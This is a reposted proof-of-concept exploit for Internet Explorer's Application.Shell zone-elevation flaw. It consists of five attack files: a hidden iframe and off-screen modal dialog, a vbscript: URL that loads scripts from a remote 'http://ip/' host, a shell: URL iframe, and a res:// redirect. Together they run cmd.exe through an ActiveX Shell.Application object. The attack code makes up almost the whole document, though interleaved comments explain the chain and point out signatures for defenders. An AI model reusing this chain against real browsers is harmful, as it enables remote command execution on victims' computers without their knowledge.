
Microsoft Internet Explorer Remote Application.Shell Exploit

Microsoft Internet Explorer Remote Application.Shell Exploit

文章作者:Jelmer

Solution: The IEFix.reg registry file will protect you from this new variant of the exploit.
----------------------------------------------------- installer.htm -------------------------------------------------------
<html>
<body>
<script language="Javascript">
// Stage 1 of the proof of concept. The script further down this page serializes this
// function with toString() and runs it inside the hidden iframe via execScript().
//  - showModalDialog() opens md.htm far off-screen (top/left -10000) at 1x1 size, so the
//    dialog is effectively invisible, and passes the current window as the dialog argument.
//    md.htm (listed below) returns that same window object as the dialog's return value.
//  - .location on the returned window reference is then set to a vbscript: URL whose value
//    is a string holding a <SCRIPT SRC=...> tag that points at shellscript_loader.js.
// NOTE(review): the &#39; entities and [url]...[/url] tags are forum-rendering artifacts and
// the statement is wrapped mid-string, so the listing is not runnable exactly as shown.
// Defender's view: an off-screen 1x1 modal dialog combined with a write of a vbscript: URL
// to another window's location is a strong indicator worth matching in content filters.
function InjectedDuringRedirection(){
showModalDialog(&#39;md.htm&#39;,window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;
dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC=&#39;[url]http://ip/shellscript_loader.js[/url]&#39;><\/script>\"";
}
</script>
<script language="javascript">

// document.write() below runs first (synchronously) and creates a hidden iframe named
// myiframe that loads redir.jsp. The two string-based timers then fire at 100 ms and
// 101 ms: the first copies the source of InjectedDuringRedirection into the iframe with
// execScript(), the second calls it there.
// NOTE(review): redir.jsp as listed on this page waits 1500 ms before redirecting, so both
// timers presumably fire while the iframe still shares this page's security context --
// confirm against the server-side timing.
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript(&#39;InjectedDuringRedirection()&#39;) ",101);
document.write(&#39;<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>&#39;);

</script>
</body>
</html>
--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">

// Return the window object received as the dialog argument to the caller unchanged:
// showModalDialog() in the opener evaluates to whatever is stored in window.returnValue.
window.returnValue = window.dialogArguments;

// Polls the opener window every 100 ms by reading dialogArguments.location.href into the
// implicit global tempVar. When that read throws, the dialog closes itself, which lets the
// blocked showModalDialog() call in the opener return.
// NOTE(review): the read presumably starts throwing once the opener frame has navigated to
// content this dialog may no longer access (i.e. the redirect has completed) -- confirm.
// The timer is re-armed even after window.close() because the catch branch does not return.
function CheckStatus(){

try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}

setTimeout("CheckStatus()",100);

}

// Start the polling loop as soon as the dialog's script is evaluated.
CheckStatus();

</SCRIPT>
--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
// Writes a <SCRIPT SRC=...> tag that references shellscript.js into the document of the
// frame named myiframe, so the next stage is fetched and evaluated inside that frame.
// NOTE(review): &#39; and [url]...[/url] are forum-rendering artifacts, not part of the
// original script.
function getRealShell() {

myiframe.document.write("<SCRIPT SRC=&#39;[url]http://ip/shellscript.js[/url]&#39;><\/SCRIPT>");

}

// Creates a 200x200 iframe on about:blank with the id myiframe, then schedules
// getRealShell() through a string-based timer 100 ms later, after the frame exists.
document.write("<IFRAME ID=myiframe SRC=&#39;about:blank&#39; WIDTH=200 HEIGHT=200></IFRAME>");

setTimeout("getRealShell()",100);
------------------------------------------------------- shellscript.js -------------------------------------------------------
// Final stage. Inserts the marker text "injected" and a deferred JScript block at the start
// of the body of the first child frame. The inserted script creates the Shell.Application
// ActiveX object and calls ShellExecute("cmd.exe","/c pause"): a harmless demonstration
// command showing that script running in that frame is able to start local programs.
// NOTE(review): the statement is wrapped mid-string by the forum rendering and uses &#39;
// entities, so it is not runnable exactly as listed.
// Defender's view: instantiation of Shell.Application from browser-rendered content, or a
// browser process spawning cmd.exe, is the behaviour to block and alert on.
function injectIt() {

document.frames[0].document.body.insertAdjacentHTML(&#39;afterBegin&#39;,&#39;injected<script language=

"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>&#39;);

}

// Writes an iframe whose source is a shell: URL naming a local file (WINDOWS\Web\TIP.HTM),
// then schedules injectIt() one second later so the frame has time to load.
// NOTE(review): the local file presumably loads in a more privileged local security zone
// than the hosting page -- confirm. A shell: URL in an iframe src supplied by web content
// is anomalous and a useful filtering/detection signature.
document.write(&#39;<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>&#39;);

setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.jsp ----------------------------------------------------------
<% Thread.sleep(1500); // hold the response for 1.5 s before answering

// Answer with an HTTP 302 redirect.
response.setStatus(302);

// The redirect target is a "URL:"-prefixed res:// address naming HTTP_501.htm inside
// shdoclc.dll. NOTE(review): presumably a resource page shipped with the browser -- confirm.
// A res:// (or other non-http) target in a Location header sent by a remote server is
// anomalous and can be rejected or alerted on at a web proxy.
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");

%>
